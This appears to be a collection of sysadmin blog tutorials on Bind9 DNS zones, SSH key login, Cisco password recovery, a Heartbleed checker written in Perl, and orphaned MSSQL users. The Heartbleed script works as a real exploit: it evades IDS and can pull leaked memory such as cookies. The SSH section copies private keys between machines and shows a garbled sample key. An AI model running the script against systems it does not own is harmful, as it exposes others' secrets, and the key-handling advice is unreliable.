Managing your own DNS records with Bind9

Managing your own DNS records with Bind9

What is DNS Server?

DNS, Domain Name System, is a system that resolves domain names eg: example.com into an IP address and vice-versa.

Geographic Separation

If you are managing your domain DNS records for the public to use then you need to make sure the servers are geographically separated. I have a couple of small low cost VPS servers in Europe and America for this purpose, the one in Australia is my own statically IP assigned internet connection.

EnvironmentNameservers

Procedure

1. Update and upgrade repositories

apt-get update && apt-get -y upgrade

2. Install Bind9 and Bind9 Utilities

apt-get install bind9, bind9utils, dnsutils

3. Create a file called “named.conf.local” under /etc/bind

vi /etc/bind/named.conf.local

4. Paste the following into the file (change example.com to the domain you are managing)

zone "example.com" {
    type master;
    file "/etc/bind/zones/example.com.db";
};

5. Make a folder to create the zone files

mkdir -p /etc/bind/zones

6. Create a zone file for your domain (change example.com to the domain you are managing)

vi /etc/bind/zones/example.com.db

7. Paste the following into the zone file (change example.com to the domain you are managing and the IP’s to the ones you use)

$TTL 600
@       IN      SOA     ns1.example.com.      admin.example.com.        (
                        2014041601      ; serial number YYYYMMDDNN
                        28800           ; Refresh
                        7200            ; Retry
                        864000          ; Expire
                        86400           ; Min TTL
                        )
@               IN      NS      ns1.example.com.
@               IN      NS      ns2.example.com.
@               IN      NS      ns3.examplec.com.
@               IN      MX      10 mail.example.com.

@               IN      A       81.4.127.249
www             IN      A       81.4.127.249
ns1             IN      A       81.4.127.249
ns2             IN      A       198.100.31.161
ns3             IN      A       120.146.236.169
mail            IN      A       81.4.127.249

8. Rndc Reload

rndc reload

9. Restart Bind9

/etc/init.d/bind9 restart

Testing

9. Check to ensure DNS is listening on UDP port 53

netstat -ntulp

You should see something like:

tcp        0      0 123.456.789.001:53       0.0.0.0:*               LISTEN      28324/named
udp        0      0 123.456.789.001:53       0.0.0.0:*                           28324/named

Note: TCP Port 53 is used for zone transfers, UDP port 53 is used for DNS lookups

Check Zone File

10. To check the zone file, run the following command (change example.com to your domain name)

named-checkzone example.com /etc/bind/zone/example.com.db

Serial Number

Ensure you change the serial number every time you make a change to your zone file!

Should you have any questions, comments or suggestions, please don’t hesitate to comment below. If you like what you have read, please share it on your favourite social media medium.

Setup SSH Keys for Linux Key Based Authentication

linux-logo-300x300

Generating RSA Keys

1. Create a folder called “.ssh” under the root folder (change ~ for the full path of the user if you are using a user account)

mkdir ~/.ssh

2. Change permissions on the “.ssh” folder to 700

chmod 700 ~/.ssh

3. Generate keys

ssh-keygen -t rsa

ssh-keygen

You will be prompted for a location to save the keys and a passphrase for the keys. The passphrase will protect your private key while it’s stored on the hard drive of the client machine but will be required every time you try and log in using a key-based system.

The default key encryption level is 2048 bits, you can increase this to 4096 bits with the -b flag (increasing the bits makes it harder to crack the key by brute force methods).

Example:

ssh-keygen -t rsa -b 4096

The keys will now be available as at ~/.ssh/id_rsa.pub and ~/.ssh/id_rsa

4. Create a file called “authorized_keys” in the ~/.ssh folder

vi ~/.ssh/authorized_keys

5. Copy the contents of id_rsa.pub to authorized_keys

Transfer Public Key

Server

6. Copy the contents of the id_rsa file to the client

cat ~/.ssh/id_rsa

Client

7. Create a file called id_rsa in ~/.ssh/

vi ~/.ssh/id_rsa

8. Paste contents (as example only)

-----BEGIN RSA PRIVATE KEY-----
7S/*"ASxqC7PVDZ;Enc%9Z$PmVcaU$np?J4U`.UWi^bz&eo"t0a9!coD2QXMsn
k=o77ku2S^&&emfb:=Im86v$NLRl*orsJ"d/[email protected]?,IW4ME"[email protected]
46w3xXX&[email protected]`BNVtdnO!OEb`zsK^9meQCnJY2KZ;L?qon2L;#Bsa6.Ymu
?fTcbG&D%FkHy?S#cmbEAOSPps6Euq1P&Ep6iDbe&[email protected];5ms#[email protected]
X&[email protected]=leX#fduTQjVUj/rxS^;%gdq*t?ea1B+FDs"8z5;[email protected]
ukK.ax,*[email protected]+O0mJCOKsR7Z9BEPuu9O90DPciA4k!gQHGGey
E27%kKxv7v!6d.#2IRqF!hzT#gJR2o3vX&vVdY'W*l="[email protected]#j=4Y
5hAe!bhsT5*dn+t!3AbWFxU5d`q:ZW8/2PKHw5zbV:`T/&?Xysy;9bbQoLNs5/7
jwavo#[email protected][email protected][email protected]/CZ3
3$*9i1#&1'[email protected]?v:cC.U:oqP+b9"u`UrU&J'tyP.h:dH+M6lx&8=F
t?Sca;Wzq&?:!&A&QzCOFu1lw.pHSx:Imf1K%,R`SYACkxnZSXP;beXvCGks#eR
JYSjVP.$!J;?DqtguG:[email protected]`Dlj8iRBuc'$NbimF^g1tbU`ne6z%JG5#do4$I
[email protected]!*[email protected]#t1LbQm*+WEsi&l/=OxVLECov%=h$F#de3w,[email protected]
[email protected],OPjDOX'J.c/5UukdW!Z=ZTN,#eZVCa6#+X8ZuM2LsOTR,[email protected]!2aow*,;L
u747$iHl2h7A.nFk70`ztxDyb^AKmWtUo9&mlLk$='kl'gud"M8Y4"*UR%.WUC,
cjD%X70puYGSh3#?1*qBf'UMmLfDQR^&nz#[email protected]=QQhZ7Ei.7O'y^+7*:.d
A%NfDr^w,7Rf#+P%*9yl5K7v#?kJ7reVRWmgp2$ZY#p`Uolc0r4%D3Q+`x+p^jll
0*BSWA$2R;&tp5+CDXH8u%1rQyI;X$`[email protected]:zK^[email protected]!xQU=7K`vundE^9jG
^!m!v,J1hv=&z&zaHk^^/N%8ptG"hc/Q8wsLtieCYqlYCFDl$7Q`+;!fq6?3mxpW
Pg$N/stX3nbJjSo3r$/ZuUFc57Z*bP7S^=LA`d`7hF7L+q%q6/V:s,u!k2!aZCs2
/QhA99NWGZtV4N3NV+?uq"=5lr%mP'=PSlA';+"VHa+2bVV.vM71SawfN=wpSKd&
j8Ts`@bC6"+X7+vSF=WUyuM;?wyuFQM&jrJJq9h7ucRWfNLjp#lOhSF'0z'^T18m
5Ff:Htg2UT4.8aLsgJSI*&8p^F^MCfQudKCJ&nhX0^oP$5&ZymY`mM$rr.,:%J
'SOP5OBVYei"/.n.f*tpazm/Ab2.2V#gtL6UsmXO#i5Mbi/jQ3v$aBQx^iC"0M.
M/+ewfWuUmRaDKrctOTccDAmIYOPJlMHuX/1aVBALK2bZnAXLniDoA==
-----END RSA PRIVATE KEY-----

9. Change permissions on id_rsa

chmod 400 ~/.ssh/id_rsa

10. Connect to the server

ssh [email protected]

All going well, you shouldn’t be prompted for a password

Adding Additional Keys

11. Follow steps 1 to 5 to create keys on the new server

12. On the client, create a file called “config” in the ~/.ssh folder

vi ~/.ssh/config

13. Paste the following into the config file

Host example1
User root
Hostname example1.com
PreferredAuthentications publickey
IdentityFile ~/.ssh/id_rsa.example1
Host example2
User root
Hostname example2
PreferredAuthentications publickey
IdentityFile ~/.ssh/id_rsa.example2

Change example1 and example2 to the servers you are connecting to.
Make sure key files are chmod 400
You can have as many entries as you want in here

Should you have any questions, comments or suggestions, please don’t hesitate to comment below. If you like what you have read, please share it on your favourite social media medium.

Cisco Enable Password Recovery on Cisco Device

cisco_logo-1000px

Cisco Enable Password Recovery on Cisco Device

Procedure

1. Connect to the device using a console cable with the following set on the port:

  • 9600 baud rate
  • No parity
  • 8 data bits
  • 1 stop bit
  • No flow control

2. Turn the router on

3. If you can access the router, type the following command at the unprivileged prompt and record the configuration register.

show version
Cisco Show Version

4. Turn off the router

5. Turn on the router

6. Hit the “Break” key on the terminal keyboard within 60 seconds of powering up in order to put the router into ROMMON

Refer to the following should the break key not workCisco Break

7. Type the following command at the “rommon 2>” prompt

confreg 0x2142

8. Type “reset” the reboot the router

Cisco Confreg

9. Type “no” after each set up question or press “Ctrl” plus “C” in order to skip the set up procedure.

10. Type the following commands to finish the reset

enable
copy running-config startup-config
configure terminal
enable secret passsword
exit

Should you have any questions, comments or suggestions, please don’t hesitate to comment below. If you like what you have read, please share it on your favourite social media medium.

Detect Heartbleed Vulnerability using Perl Script

heartbleed

Check to see if sites you access are still vulnerable to the Heartbleed exploit (CVE-2014-0160) by running the following Perl script:

1. Create a file called check-ssl-heartbleed.pl and paste the following contents:

vi check-ssl-heartbleed.pl

1a. Paste the following into check-ssl-heartbleed.pl

#!/usr/bin/perl
use strict;
use warnings;
use Getopt::Long qw(:config posix_default bundling);

# try to use IPv6
my $INETCLASS;
BEGIN {
 my @mod = qw(IO::Socket::IP IO::Socket::INET6 IO::Socket::INET);
 while ($INETCLASS = shift @mod) {
 last if eval "require $INETCLASS";
 die "failed to load $INETCLASS: [email protected]" if ! @mod;
 }
}

my $starttls = sub {1};
my $starttls_arg;
my $timeout = 5;
my $quiet = 0;
my $show = 0;
my $show_ascii = 0;
my $ssl_version = 'auto';
my @show_regex;
my $heartbeats = 1;
my $show_cert;
my $sni_hostname;
my %starttls = (
 'smtp' => [ 25, &smtp_starttls ],
 'http_proxy' => [ 8000, &http_connect ],
 'http_upgrade' => [ 80, &http_upgrade ],
 'imap' => [ 143, &imap_starttls ],
 'pop' => [ 110, &pop_stls ],
 'ftp' => [ 21, &ftp_auth ],
 'postgresql' => [ 5432, &postgresql_init ],
);

sub usage {
 print STDERR "ERROR: @_n" if @_;
 print STDERR <<USAGE;

Check if server is vulnerable against heartbleed SSL attack (CVE-2014-0160)
Features:
- can start with plain and upgrade with STARTTLS or similar commands with
 IMAP, POP, SMTP, FTP, HTTP and HTTP proxies, PostgreSQL
- heartbeat request is sent in two packets to circumvent simple packet
 matching IDS or packet filters
- handshake is done with TLS1.0 for better compatibility, heartbeat uses
 SSL version from server
- can use regular expressions to directly extract information from
 vulnerable sites
- can use IPv6

Usage: $0 [ --starttls proto[:arg] ] [ --timeout T ] host:port
 -h|--help - this screen
 --starttls proto[:arg] - start plain and upgrade to SSL with starttls protocol
 (imap,smtp,http_upgrade,http_proxy,pop,ftp,postgresql)
 -q|--quiet - don't show anything, exit 1 if vulnerable
 -c|--show-cert - show some information about certificate
 -s|--show-data [L] - show heartbeat response if vulnerable, optional
 parameter L specifies number of bytes per line (16)
 -a|--show-ascii [L] - show heartbeat response ascii only if vulnerable, optional
 parameter L specifies number of bytes per line (80)
 -R|--show-regex-match R - show data matching perl regex R. Option can be
 used multiple times
 --ssl_version V - specify SSL version to use, e.g. ssl3, tlsv1,
 tlsv1_1, tlsv1_2 or auto (default), which tries
 until it gets a server hello back
 --sni-hostname H - specifiy hostname for SNI, set to '' to disable SNI
 will try with target host of not given
 -H|--heartbeats N - number of heartbeats (default 1)
 -T|--timeout T - use timeout (default 5)

Examples:
 # check direct www, imaps .. server
 $0 www.google.com:443
 $0 www.google.com:https
 $0 mail.google.com:imaps

 # try to get Cookies
 $0 -R 'Cookie:.*' www.broken-site.com:443

 # check webserver via proxy
 $0 --starttls http_proxy:www.google.com:443 proxy:8000

 # check webserver with http upgrade (OPTIONS *...)
 $0 --starttls http_upgrade 127.0.0.1:631

 # check webserver with http upgrade (GET /..)
 $0 --starttls http_upgrade:get=/ 127.0.0.1:631

 # check imap server, start with plain and upgrade
 $0 --starttls imap imap.gmx.net:143

 # check pop server, start with plain and upgrade
 $0 --starttls pop pop.gmx.net:110

 # check smtp server, start with plain and upgrade
 $0 --starttls smtp smtp.gmail.com:587

USAGE
 exit(2);
}

my $default_port = 443;
GetOptions(
 'h|help' => sub { usage() },
 'T|timeout=i' => $timeout,
 's|show-data:i' => sub { $show = $_[1] || 16 },
 'a|show-ascii:i' => sub { $show_ascii = $_[1] || 80 },
 'R|show-regex-match:s' => @show_regex,
 'c|show-cert' => $show_cert,
 'q|quiet' => $quiet,
 'sni-hostname:s' => $sni_hostname,
 'H|heartbeats=i' => $heartbeats,
 'starttls=s' => sub {
 (my $proto,$starttls_arg) = $_[1] =~m{^(w+)(?::(.*))?$};
 my $st = $proto && $starttls{$proto};
 usage("invalid starttls protocol $_[1]") if ! $st;
 ($default_port,$starttls) = @$st;
 },
 'ssl_version=s' => $ssl_version,
);

# use Net::SSLeay to print certificate information
# need version >= 1.46 for d2i_x509_bio
my $load_netssleay = sub {
 return 1 if eval { require Net::SSLeay } && $Net::SSLeay::VERSION >= 1.46;
 return if shift; # try w/o error
 die "need Net::SSLeay >= 1.46 to show certificate information";
};
$load_netssleay->(0) if $show_cert;

# try to do show_cert by default if not quiet, but don't complain if we
# cannot do it because we have no Net::SSLeay
$show_cert ||= ! $quiet && $load_netssleay->(1) && -1;

$ssl_version =
 lc($ssl_version) eq 'ssl3' ? 0x0300 :
 $ssl_version =~ m{^tlsv?1(?:_([12]))?}i ? 0x0301 + ($1||0) :
 0; # try possible versions

my $show_regex;
if (@show_regex) {
 my @rx;
 push @rx, eval { qr{$_} } || die "invalid perl regex '$_'"
 for(@show_regex);
 $show_regex = join('|',@rx);
 $show_regex = eval { qr{$show_regex} } || die "invalid regex: $show_regex";
}

my $dst = shift(@ARGV) or usage("no destination given");
$dst .= ":$default_port" if $dst !~ m{^([^:]+|.+]):w+$};
( my $hostname = $dst ) =~s{:w+$}{};
$hostname = $1 if $hostname =~m{^[(.*)]$};

if ( ! defined $sni_hostname ) {
 $sni_hostname = $hostname;
 $sni_hostname = '' if $sni_hostname =~m{:|^[d.]+$}; # IP6/IP4
}

my $connect = sub {
 my ($ssl_version,$sni,$ciphers) = @_;

 my $cl = $INETCLASS->new(
 ref($dst) ? ( PeerAddr => $dst->[0], PeerPort => $dst->[1] )
 : ( PeerAddr => $dst ),
 Timeout => $timeout
 ) or die "failed to connect: $!";
 # save dst to not resolve name every connect attempt
 $dst = [ $cl->peerhost, $cl->peerport ] if ! ref($dst);

 # disable NAGLE to send heartbeat with multiple small packets
 setsockopt($cl,6,1,pack("l",1));
 # skip plaintext before starting SSL handshake
 $starttls->($cl,$hostname);

 # extensions
 my $ext = '';
 if ( defined $sni and $sni ne '' ) {
 $ext .= pack('nn/a*', 0x00, # server_name extension + length
 pack('n/a*', # server_name list length
 pack('Cn/a*',0,$sni) # type host_name(0) + length/server_name
 ));
 }

 # built and send ssl client hello
 my $hello_data = pack("nNn14Cn/a*C/a*n/a*",
 $ssl_version,
 time(),
 ( map { rand(0x10000) } (1..14)),
 0, # session-id length
 pack("C*",@$ciphers),
 "\0", # compression null
 $ext,
 );

 $hello_data = substr(pack("N/a*",$hello_data),1); # 3byte length
 print $cl pack(
 "Cnn/a*",0x16,$ssl_version, # type handshake, version, length
 pack("Ca*",1,$hello_data), # type client hello, data
 );

 my $use_version;
 my $got_server_hello;
 my $err;
 while (1) {
 my ($type,$ver,@msg) = _readframe($cl,$err) or return;

 # first message must be server hello
 $got_server_hello ||= $type == 22 and grep { $_->[0] == 2 } @msg;
 return if ! $got_server_hello;

 # wait for server hello done
 if ( $type == 22 and grep { $_->[0] == 0x0e } @msg ) {
 # server hello done
 $use_version = $ver;
 last;
 }
 }

 return ($cl,$use_version);
};

# these are the ciphers we try
# that's all openssl -V ciphers reports with my openssl1.0.1
my @ssl3_ciphers = (
 0xC0,0x14, 0xC0,0x0A, 0xC0,0x22, 0xC0,0x21, 0x00,0x39, 0x00,0x38,
 0x00,0x88, 0x00,0x87, 0xC0,0x0F, 0xC0,0x05, 0x00,0x35, 0x00,0x84,
 0x00,0x8D, 0xC0,0x12, 0xC0,0x08, 0xC0,0x1C, 0xC0,0x1B, 0x00,0x16,
 0x00,0x13, 0xC0,0x0D, 0xC0,0x03, 0x00,0x0A, 0x00,0x8B, 0xC0,0x13,
 0xC0,0x09, 0xC0,0x1F, 0xC0,0x1E, 0x00,0x33, 0x00,0x32, 0x00,0x9A,
 0x00,0x99, 0x00,0x45, 0x00,0x44, 0xC0,0x0E, 0xC0,0x04, 0x00,0x2F,
 0x00,0x96, 0x00,0x41, 0x00,0x8C, 0xC0,0x11, 0xC0,0x07, 0xC0,0x0C,
 0xC0,0x02, 0x00,0x05, 0x00,0x04, 0x00,0x8A, 0x00,0x15, 0x00,0x12,
 0x00,0x09, 0x00,0x14, 0x00,0x11, 0x00,0x08, 0x00,0x06, 0x00,0x03,
);
my @tls12_ciphers = (
 0xC0,0x30, 0xC0,0x2C, 0xC0,0x28, 0xC0,0x24, 0x00,0xA3, 0x00,0x9F,
 0x00,0x6B, 0x00,0x6A, 0xC0,0x32, 0xC0,0x2E, 0xC0,0x2A, 0xC0,0x26,
 0x00,0x9D, 0x00,0x3D, 0xC0,0x2F, 0xC0,0x2B, 0xC0,0x27, 0xC0,0x23,
 0x00,0xA2, 0x00,0x9E, 0x00,0x67, 0x00,0x40, 0xC0,0x31, 0xC0,0x2D,
 0xC0,0x29, 0xC0,0x25, 0x00,0x9C, 0x00,0x3C,
);

# try to connect and do ssl handshake either with the specified version or with
# different versions (downgrade). Some servers just close if you start with
# TLSv1.2 instead of replying with a lesser version
my ($cl,$use_version);
for my $ver ( $ssl_version ? $ssl_version : ( 0x303, 0x302, 0x301, 0x300 )) {
 my @ciphers = (( $ver == 0x303 ? @tls12_ciphers : ()), @ssl3_ciphers );
 if ( $sni_hostname ) {
 verbose("...try to connect with version 0x%x with SNI",$ver);
 ($cl,$use_version) = $connect->( $ver, $sni_hostname, @ciphers ) and last;
 }
 verbose("...try to connect with version 0x%x w/o SNI",$ver);
 ($cl,$use_version) = $connect->( $ver, $sni_hostname, @ciphers ) and last;
}

# TODO: if everything fails we might have a F5 in front which cannot deal
# with large client hellos.
die "Failed to make a successful TLS handshake with peer.n".
 "Either peer does not talk SSL or sits behind some stupid SSL middlebox."
 if ! $cl;

# heartbeat request with wrong size
# send in two packets to work around stupid IDS which try
# to detect attack by matching packets only
my $hb = pack("Cnn/a*",0x18,$use_version,
 pack("Cn",1,0x4000));

for (1..$heartbeats) {
 verbose("...send heartbeat#$_");
 print $cl substr($hb,0,1);
 print $cl substr($hb,1);
}

my $err;
if ( my ($type,$ver,$buf) = _readframe($cl,$err,1)) {
 if ( $type == 21 ) {
 verbose("received alert (probably not vulnerable)");
 } elsif ( $type != 24 ) {
 verbose("unexpected reply type $type");
 } elsif ( length($buf)>3 ) {
 verbose("BAD! got ".length($buf)." bytes back instead of 3 (vulnerable)");
 show_data($buf,$show) if $show;
 show_ascii($buf,$show_ascii) if $show_ascii;
 if ( $show_regex ) {
 while ( $buf =~m{($show_regex)}g ) {
 print STDERR $1."n";
 }
 }
 exit 1;
 } else {
 verbose("GOOD proper heartbeat reply (not vulnerable)");
 }
} else {
 verbose("no reply($err) - probably not vulnerable");
}

sub _readframe {
 my ($cl,$rerr,$errok) = @_;
 my $len = 5;
 my $buf = '';
 vec( my $rin = '',fileno($cl),1 ) = 1;
 while ( length($buf)<$len ) {
 if ( ! select( my $rout = $rin,undef,undef,$timeout )) {
 $$rerr = 'timeout';
 last if $errok;
 return;
 };
 if ( ! sysread($cl,$buf,$len-length($buf),length($buf))) {
 $$rerr = "eof";
 $$rerr .= " after ".length($buf)." bytes" if $buf ne '';
 last if $errok;
 return;
 }
 $len = unpack("x3n",$buf) + 5 if length($buf) == 5;
 }
 return if length($buf)<5;
 (my $type, my $ver) = unpack("Cnn",substr($buf,0,5,''));
 my @msg;
 if ( $type == 22 ) {
 while ( length($buf)>=4 ) {
 my ($ht,$len) = unpack("Ca3",substr($buf,0,4,''));
 $len = unpack("N","\0$len");
 push @msg,[ $ht,substr($buf,0,$len,'') ];
 verbose("...ssl received type=%d ver=0x%x ht=0x%x size=%d",
 $type,$ver,$ht,length($msg[-1][1]));
 if ( $show_cert && $ht == 11 ) {
 my $clen = unpack("N","\0".substr($msg[-1][1],0,3));
 my $certs = substr($msg[-1][1],3,$clen);
 my $i = 0;
 while ($certs ne '') {
 my $clen = unpack("N","\0".substr($certs,0,3,''));
 my $cert = substr($certs,0,$clen,'');
 length($cert) == $clen or
 die "invalid certificate length ($clen vs. ".length($cert).")";
 if ( my $line = eval { cert2line($cert) } ) {
 printf "[%d] %sn",$i, $line;
 } elsif ( $show_cert>0 ) {
 die "failed to convert cert to string: [email protected]";
 }
 $i++;
 }
 }
 }
 } else {
 @msg = $buf;
 verbose("...ssl received type=%d ver=%x size=%d",
 $type,$ver,length($buf));
 }

 return ($type,$ver,@msg);
}

sub smtp_starttls {
 my $cl = shift;
 my $last_status_line = qr/((d)dd(?:s.*)?)/;
 my ($line,$code) = _readlines($cl,$last_status_line);
 $code == 2 or die "server denies access: $linen";
 print $cl "EHLO example.comrn";
 ($line,$code) = _readlines($cl,$last_status_line);
 $code == 2 or die "server did not accept EHLO: $linen";
 print $cl "STARTTLSrn";
 ($line,$code) = _readlines($cl,$last_status_line);
 $code == 2 or die "server did not accept STARTTLS: $linen";
 verbose("...reply to starttls: $line");
 return 1;
}

sub imap_starttls {
 my $cl = shift;
 <$cl>; # welcome
 print $cl "abc STARTTLSrn";
 while (<$cl>) {
 m{^abc (OK)?} or next;
 $1 or die "STARTTLS failed: $_";
 s{r?n$}{};
 verbose("...starttls: $_");
 return 1;
 }
 die "starttls failed";
}

sub pop_stls {
 my $cl = shift;
 <$cl>; # welcome
 print $cl "STLSrn";
 my $reply = <$cl>;
 die "STLS failed: $reply" if $reply !~m{^+OK};
 $reply =~s{r?n}{};
 verbose("...stls $reply");
 return 1;
}

sub http_connect {
 my $cl = shift;
 $starttls_arg or die "no target host:port given";
 print $cl "CONNECT $starttls_arg HTTP/1.0rnrn";
 my $hdr = _readlines($cl,qr/r?n/);
 $hdr =~m{A(HTTP/1.[01]s+(ddd)[^rn]*)};
 die "CONNECT failed: $1" if $2 != 200;
 verbose("...connect request: $1");
 return 1;
}

sub http_upgrade {
 my ($cl,$hostname) = @_;
 my $rq;
 if ( $starttls_arg && $starttls_arg =~m{^get(?:=(S+))?}i ) {
 my $path = $1 || '/';
 $rq = "GET $path HTTP/1.1rn".
 "Host: $hostnamern".
 "Upgrade: TLS/1.0rn".
 "Connection: Upgradern".
 "rn";
 } else {
 my $path = $starttls_arg && $starttls_arg =~m{^options=(S+)}i
 ? $1:'*';
 $rq = "OPTIONS $path HTTP/1.1rn".
 "Host: $hostnamern".
 "Upgrade: TLS/1.0rn".
 "Connection: Upgradern".
 "rn";
 }
 print $cl $rq;
 my $hdr = _readlines($cl,qr/r?n/);
 $hdr =~m{A(HTTP/1.[01]s+(ddd)[^rn]*)};
 die "upgrade not accepted, code=$2 (expect 101): $1" if $2 != 101;
 verbose("...tls upgrade request: $1");
 return 1;
}

sub ftp_auth {
 my $cl = shift;
 my $last_status_line = qr/((d)dd(?:s.*)?)/;
 my ($line,$code) = _readlines($cl,$last_status_line);
 die "server denies access: $linen" if $code != 2;
 print $cl "AUTH TLSrn";
 ($line,$code) = _readlines($cl,$last_status_line);
 die "AUTH TLS denied: $linen" if $code != 2;
 verbose("...ftp auth: $line");
 return 1;
}

sub postgresql_init {
 my $cl = shift;
 # magic header to initiate SSL:
 # http://www.postgresql.org/docs/devel/static/protocol-message-formats.html
 print $cl pack("NN",8,80877103);
 read($cl, my $buf,1 ) or die "did not get response from postgresql";
 $buf eq 'S' or die "postgresql does not support SSL (response=$buf)";
 verbose("...postgresql supports SSL: $buf");
 return 1;
}

sub verbose {
 return if $quiet;
 my $msg = shift;
 $msg = sprintf($msg,@_) if @_;
 print STDERR $msg,"n";
}

sub show_data {
 my ($data,$len) = @_;
 my $lastd = '';
 my $repeat = 0;
 while ( $data ne '' ) {
 my $d = substr($data,0,$len,'' );
 $repeat++,next if $d eq $lastd;
 $lastd = $d;
 if ( $repeat ) {
 print STDERR "... repeated $repeat times ...n";
 $repeat = 0;
 }
 ( my $h = unpack("H*",$d)) =~s{(..)}{$1 }g;
 ( my $c = $d ) =~s{[x00-x20x7f-xff]}{.}g;
 my $hl = $len*3;
 printf STDERR "%-${hl}s %-${len}sn",$h,$c;
 }
 print STDERR "... repeated $repeat times ...n" if $repeat;
}

sub show_ascii {
 my ($data,$len) = @_;
 my $lastd = '';
 my $repeat = 0;
 while ( $data ne '' ) {
 my $d = substr($data,0,$len,'' );
 $repeat++,next if $d eq $lastd;
 $lastd = $d;
 if ( $repeat ) {
 print STDERR "... repeated $repeat times ...n";
 $repeat = 0;
 }
 ( my $c = $d ) =~s{[x00-x20x7f-xff]}{.}g;
 printf STDERR "%-${len}sn",$c;
 }
 print STDERR "... repeated $repeat times ...n" if $repeat;
}

sub cert2line {
 my $der = shift;
 my $bio = Net::SSLeay::BIO_new( Net::SSLeay::BIO_s_mem());
 Net::SSLeay::BIO_write($bio,$der);
 my $cert = Net::SSLeay::d2i_X509_bio($bio);
 Net::SSLeay::BIO_free($bio);
 $cert or die "cannot parse certificate: ".
 Net::SSLeay::ERR_error_string(Net::SSLeay::ERR_get_error());
 my $not_before = Net::SSLeay::X509_get_notBefore($cert);
 my $not_after = Net::SSLeay::X509_get_notAfter($cert);
 $_ = Net::SSLeay::P_ASN1_TIME_put2string($_) for($not_before,$not_after);
 my $subject = Net::SSLeay::X509_NAME_oneline(
 Net::SSLeay::X509_get_subject_name($cert));
 return "$subject | $not_before - $not_after";
}

sub _readlines {
 my ($cl,$stoprx) = @_;
 my $buf = '';
 while (<$cl>) {
 $buf .= $_;
 return $buf if ! $stoprx;
 next if ! m{A$stoprxZ};
 return ( m{A$stoprxZ},$buf );
 }
 die "eof" if $buf eq '';
 die "unexpected response: $buf";
}

2. Run script

perl check-ssl-heartbleed.pl

Or download it here check-ssl-heartbleed.pl

How to fix orphaned MSSQL Server users

mssql

 

Orphaned Microsoft SQL users can occur when the user is in the database but not in the instance, even if you create an identical username the user on the database won’t match the instance user. This is all to do with the GUID (called a SID in Microsoft terms) that do not match,

1. Check to see if there are actually orphaned users:

USE <database_name>;
GO;
sp_change_users_login @Action='Report';
GO;

2. Relink the server login already specified by <login_name> with the database user specified by <database_user>

USE <database_name>;
GO
sp_change_users_login @Action='update_one', @UserNamePattern='<database_user>',
@LoginName='<login_name>';
GO

Should you have any questions, comments or suggestions, please don’t hesitate to comment below. If you like what you have read, please share it on your favourite social media medium.